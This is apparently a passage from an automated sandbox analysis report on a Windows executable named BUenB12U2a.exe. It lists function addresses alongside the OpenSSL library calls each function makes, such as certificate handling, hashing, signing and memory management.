                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0D5CF0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,d2i_X509,X509_get0_pubkey,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0D5CF0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1F50 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,1_2_00007FFDFB0B1F50
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1CBC EVP_MD_get_size,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,_time64,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1CBC
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB113D30 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,1_2_00007FFDFB113D30
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F9370 ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFB0F9370
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B11BD CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B11BD
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB113420 ERR_new,ERR_set_debug,X509_get0_pubkey,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,EVP_PKEY_encrypt_init,RAND_bytes_ex,EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,1_2_00007FFDFB113420
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B155A ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,1_2_00007FFDFB0B155A
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F52A0 CRYPTO_free,1_2_00007FFDFB0F52A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B230B ERR_new,ERR_set_debug,_time64,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_new,EVP_MD_fetch,ERR_new,ERR_new,ERR_set_debug,EVP_MD_free,EVP_MD_get_size,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_free,CRYPTO_free,1_2_00007FFDFB0B230B
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1997 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,1_2_00007FFDFB0B1997
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0FD2F0 RAND_bytes_ex,CRYPTO_malloc,memset,1_2_00007FFDFB0FD2F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB1012E0 ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,1_2_00007FFDFB1012E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0BD2E1 CRYPTO_free,1_2_00007FFDFB0BD2E1
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1ED8 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0B1ED8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1992 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,OPENSSL_LH_new,X509_STORE_new,CTLOG_STORE_new_ex,OPENSSL_sk_num,X509_VERIFY_PARAM_new,OPENSSL_sk_new_null,OPENSSL_sk_new_null,CRYPTO_new_ex_data,CRYPTO_secure_zalloc,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1992
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1ACD ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B1ACD
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B144C EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,1_2_00007FFDFB0B144C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB11D170 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,1_2_00007FFDFB11D170
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B111D CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_malloc,memcpy,CRYPTO_malloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_new,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,1_2_00007FFDFB0B111D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B20EF CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B20EF
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1483 CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1483
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB113210 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,1_2_00007FFDFB113210
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0BB200 CRYPTO_clear_free,1_2_00007FFDFB0BB200
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0BF060 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFB0BF060
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB11B0D0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB11B0D0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2121 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memcmp,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B2121
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1262 X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,1_2_00007FFDFB0B1262
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB1010C0 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFB1010C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0DD0C0 CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,1_2_00007FFDFB0DD0C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB111126 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFB111126
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0BD140 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0BD140
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B108C ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFDFB0B108C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB107770 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB107770
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB129790 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free,1_2_00007FFDFB129790
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1582 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFDFB0B1582
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C97B0 CRYPTO_free,CRYPTO_strdup,1_2_00007FFDFB0C97B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0BF7F0 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,CRYPTO_malloc,CRYPTO_malloc,EVP_PKEY_encapsulate,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_free,EVP_PKEY_CTX_free,1_2_00007FFDFB0BF7F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB119850 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB119850
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B11DB EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,1_2_00007FFDFB0B11DB
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B19E7 CRYPTO_free,1_2_00007FFDFB0B19E7
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B162C EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,1_2_00007FFDFB0B162C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB127820 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_new,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB127820
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1846 OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,OPENSSL_sk_num,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_pop_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OPENSSL_sk_pop_free,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1846
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2522 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B2522
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB10F660 CRYPTO_free,CRYPTO_memdup,1_2_00007FFDFB10F660
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B176C CRYPTO_malloc,CRYPTO_THREAD_lock_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_up_ref,X509_chain_up_ref,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_dup_ex_data,CRYPTO_strdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_memdup,1_2_00007FFDFB0B176C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C7730 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFDFB0C7730
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1087 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,1_2_00007FFDFB0B1087
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B25D6 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,1_2_00007FFDFB0B25D6
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0DD750 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,1_2_00007FFDFB0DD750
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F35E0 CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0F35E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1646 EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get_id,EVP_PKEY_get_id,EVP_PKEY_get_id,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,EVP_DigestVerify,ERR_new,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free,1_2_00007FFDFB0B1646
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B193D CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0B193D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0E3460 CRYPTO_malloc,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,ERR_set_debug,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,CRYPTO_strdup,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0E3460
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1023 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,1_2_00007FFDFB0B1023
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0FF490 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0FF490
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C14E0 CRYPTO_free,CRYPTO_strndup,1_2_00007FFDFB0C14E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B12CB CRYPTO_THREAD_run_once,1_2_00007FFDFB0B12CB
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB125540 CRYPTO_memcmp,1_2_00007FFDFB125540
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0BF540 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_derive_set_peer,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,1_2_00007FFDFB0BF540
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B4BD0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0B4BD0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1F87 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1F87
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2464 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B2464
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F2C10 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFDFB0F2C10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0CEC00 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,1_2_00007FFDFB0CEC00
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0E4C28 EVP_MAC_CTX_free,CRYPTO_free,1_2_00007FFDFB0E4C28
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB106C40 CRYPTO_realloc,1_2_00007FFDFB106C40
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B20E0 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B20E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B117C _time64,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,1_2_00007FFDFB0B117C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0F8A90 CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFB0F8A90
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B110E EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,ERR_new,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,1_2_00007FFDFB0B110E
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B4B10 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFDFB0B4B10
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B213F EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFDFB0B213F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0DEB40 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,_time64,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,memcpy,1_2_00007FFDFB0DEB40
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1811 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,1_2_00007FFDFB0B1811
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C6990 CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_value,EVP_CIPHER_fetch,EVP_CIPHER_get_flags,1_2_00007FFDFB0C6990
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0C4980 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_snprintf,1_2_00007FFDFB0C4980
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1A32 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1A32
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2577 ERR_new,ERR_set_debug,CRYPTO_free,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_cleanse,1_2_00007FFDFB0B2577
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B1A41 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFDFB0B1A41
